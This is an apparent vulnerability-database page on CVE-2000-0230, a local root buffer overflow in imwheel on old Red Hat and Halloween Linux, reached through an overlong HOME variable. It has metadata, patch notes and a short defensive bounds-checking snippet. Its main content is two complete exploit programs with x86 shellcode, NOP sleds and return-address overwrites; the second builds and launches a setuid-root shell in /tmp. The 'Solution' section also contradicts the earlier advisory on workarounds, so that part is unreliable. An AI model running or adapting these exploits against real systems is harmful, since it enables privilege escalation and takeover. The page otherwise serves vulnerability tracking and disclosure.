CVE-2000-0230
CVSS 7.2
Published: 2000-03-13 00:00:00
Revised: 2008-09-10 15:03:40

[Original] Buffer overflow in imwheel allows local users to gain root privileges via the imwheel-solo script and a long HOME environment variable.


[CNNVD] imwheel vulnerability in multiple Linux vendors (CNNVD-200003-026)

        A buffer overflow exists in imwheel; a local user can obtain root privileges through the imwheel-solo script and an overlong HOME environment variable.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may lead to a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/o:redhat:linux:6.2  Red Hat Linux 6.2
cpe:/o:redhat:linux:6.1  Red Hat Linux 6.1
cpe:/o:halloween:halloween_linux:4.0  Halloween Linux 4.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0230
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0230
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-026
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1060
(UNKNOWN)  BID  1060
http://www.redhat.com/support/errata/RHSA-2000-016.html
(UNKNOWN)  REDHAT  RHSA-2000:016
http://archives.neohapsis.com/archives/bugtraq/2000-03/0168.html
(UNKNOWN)  BUGTRAQ  20000316 TESO & C-Skills development advisory -- imwheel

- Vulnerability information

imwheel vulnerability in multiple Linux vendors
High severity  Buffer overflow
2000-03-13 00:00:00  2005-05-02 00:00:00
Local
        A buffer overflow exists in imwheel; a local user can obtain root privileges through the imwheel-solo script and an overlong HOME environment variable.

- Advisories and patches

        RedHat has made patches available for this problem.
        Removal of the setuid wrapper script 'imwheel-solo' will eliminate this problem.
        RedHat Linux 6.1 i386
        RedHat Linux 6.1 sparc
        RedHat Linux 6.1 alpha
        RedHat Linux 6.2 sparc
        RedHat Linux 6.2 i386
        RedHat Linux 6.2 alpha
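The root cause behind both exploits on this page is a fixed-size path buffer filled from the attacker-controlled HOME variable without a length check (the second exploit sizes its payload to a 2048-byte "filename-buffer"). The following is an added, defender-side reconstruction, not imwheel's actual source: the unsafe composition pattern beside a hardened builder that computes the required length first and refuses an overlong HOME. The buffer size 2048, the config file name `.imwheelrc` and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size; follows the exploits' 2048-byte filename buffer. */
#define RC_BUFLEN 2048
/* Assumed config file name appended to $HOME. */
#define RC_NAME   "/.imwheelrc"

/* Unsafe pattern: sprintf() trusts the length of an environment variable the
 * caller controls, so an overlong HOME runs past the end of 'out'. Shown for
 * contrast only; nothing below calls it. */
int build_rc_path_unsafe(const char *home, char *out)
{
    sprintf(out, "%s" RC_NAME, home);   /* no bound on strlen(home) */
    return 0;
}

/* Hardened builder: the caller passes the real buffer size, the needed length
 * is computed before any byte is written, and an overlong HOME is rejected
 * with -1 instead of being truncated or copied past the buffer. */
int build_rc_path_safe(const char *home, char *out, size_t outlen)
{
    size_t hlen, need;
    if (home == NULL || out == NULL || outlen == 0)
        return -1;
    hlen = strlen(home);
    need = hlen + strlen(RC_NAME) + 1;         /* +1 for the terminating NUL */
    if (need > outlen)
        return -1;                             /* would overflow: refuse */
    memcpy(out, home, hlen);
    memcpy(out + hlen, RC_NAME, strlen(RC_NAME) + 1);
    return 0;
}

/* Self-check with a constructed 2070-byte HOME (BUFFER in the first exploit).
 * Returns 1 when a normal home directory is accepted and the overlong one is
 * rejected, 0 otherwise. */
int demo(void)
{
    static char longhome[2070 + 1];
    char out[RC_BUFLEN];
    memset(longhome, 'A', sizeof(longhome) - 1);
    longhome[sizeof(longhome) - 1] = '\0';
    if (build_rc_path_safe("/home/alice", out, sizeof(out)) != 0)
        return 0;
    if (strcmp(out, "/home/alice/.imwheelrc") != 0)
        return 0;
    return build_rc_path_safe(longhome, out, sizeof(out)) == -1;
}
```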

- Vulnerability information (19811)

Halloween Linux 4.0, RedHat Linux 6.1/6.2 imwheel Vulnerability (1) (EDBID:19811)
linux local
2000-03-13 Verified
0 funkysh
N/A
source: http://www.securityfocus.com/bid/1060/info

A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. 

/*
 *  imwheel local root exploit [ RHSA-2000:016-02 ]
 *  funkysh 04/2000 funkysh@kris.top.pl
 */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

#define BUFFER 2070
#define NOP 0x90
#define PATH "/usr/X11R6/bin/imwheel-solo"  

char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
            "\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
            "\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
            "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long getesp(void) { __asm__("movl %esp,%eax"); }
        
int main(int argc, char *argv[])
{
  int i, offset = 0;
  char buf[BUFFER];
  long address;
  if(argc > 1) offset = atoi(argv[1]);
  address = getesp() + 1000 + offset;
  memset(buf,NOP,BUFFER);
  memcpy(buf+(BUFFER-300),code,strlen(code));

  for(i=(BUFFER-250);i<BUFFER;i+=4)
  *(int *)&buf[i]=address;
  setenv("DISPLAY", "DUPA", 1);
  setenv("HOME", buf, 1);
  execl(PATH, PATH, 0);
}

- Vulnerability information (19812)

Halloween Linux 4.0, RedHat Linux 6.1/6.2 imwheel Vulnerability (2) (EDBID:19812)
linux local
2000-03-13 Verified
0 S. Krahmer & Stealth
N/A
source: http://www.securityfocus.com/bid/1060/info
 
A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string containing machine executable code, the imwheel program can be caused to run arbitrary commands as root. This is due to a setuid root perl script named 'imwheel-solo' which invokes the imwheel program with effective UID 0. 

/*** Halloween 4 local root exploit for imwheel-solo. Other distros are
 *** maybe affected as well.
 *** (C) 2000 by C-skills development. Under the GPL. 
 *** 
 *** Bugdiscovery + exploit by S. Krahmer & Stealth.
 ***
 *** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
 ***
 *** other advisories and kewl stuff at:
 *** http://www.cs.uni-potsdam.de/homepages/students/linuxer
 ***
 ***/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen */
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>



/* chown("/tmp/boomsh", 0, 0); chmod("/tmp/boomsh", 04755);
 */
char shell[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x58\x80\x36\x01\x46\xe2\xfa"
"\xea\x0d\x2e\x75\x6c\x71\x2e\x63\x6e\x6e\x6c\x72\x69\x01\x80\xed"
"\x66\x2a\x01\x01\x54\x88\xe4\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xab\x11"
"\x01\x01\x30\xc8\x8c\xb2\x3b\xee\xfe\xfe\xb9\xb7\x01\x01\x01\x88\xcb\x52\x88"
"\xf2\xcc\x81\xb8\xec\x08\x01\x01\xb9\x0e\x01\x01\x01\x52\x88\xf2\xcc\x81\x30"
"\xc1\x5a\x5f\x88\xed\x5c\xc2\x91\x91\x91\x91\x91\x91\x91\x91";


/* filename-buffer plus ret + ebp
 */
#define buflen (2048+8)

int main(int argc, char **argv)
{
	char *im[] = {
		"/usr/X11R6/bin/imwheel-solo", 
		0
	};
	char *a[] = {
		"/tmp/boomsh",
		0
	};
	FILE *f;
	struct stat s;	
	char boom[buflen+10];
	int i = 0, j = 0, ret =  0xbfffee68;	/* this address works for me */

	if ((f = fopen("/tmp/boomsh.c", "w+")) == NULL) {
		perror("fopen");
		exit(errno);
	}
	printf("Creating boom-shell...\n");
	fprintf(f, "int main() {char *a[]={\"/bin/sh\",0};\nsetuid(0);\nexecve(*a, a, 0);\nreturn 0;}\n");
	fclose(f);
	system("cc /tmp/boomsh.c -o /tmp/boomsh");

	printf("Creating shellcode...\n");
	memset(boom, 0, sizeof(boom));
	memset(boom, 0x90, buflen);
	if (argc > 1)
		ret += atoi(argv[1]);
	else
		printf("You can also add an offset to the commandline.\n");
	for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
		boom[i] = shell[j++];
	*(long*)(&boom[i]) = ret; 
	
	printf("Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer\n"
	       "Respect other users privacy!\n");
	
	setenv("HOME", boom, 1);
	setenv("DISPLAY", ":0", 1);
	
	printf("Invoking vulnerable program (imwheel-solo)...\n");
	if (fork() == 0) {
		execl(im[0], im[0], (char *)0);	/* im[] holds only the path and a NULL */
	}
	sleep(4);
	
	memset(&s, 0, sizeof(s));
	stat("/tmp/boomsh", &s);
	if ((S_ISUID & s.st_mode) != S_ISUID) {
		printf("Boom-shell not SUID-root! Wrong offset or patched version of imwheel.\n");
		return -1;
	}
	/* Huh? :-)
	 */
	printf("Knocking on heavens door...\n");
	execve(a[0], a, 0);
	return 0;
}

- Vulnerability information

1258
Linux imwheel HOME Environment Variable Local Overflow
Local Access Required; Input Manipulation
Loss of Integrity; Patch / RCS
Exploit Public; Third-party Verified

- Vulnerability description

- Timeline

2000-03-16 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Red Hat has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete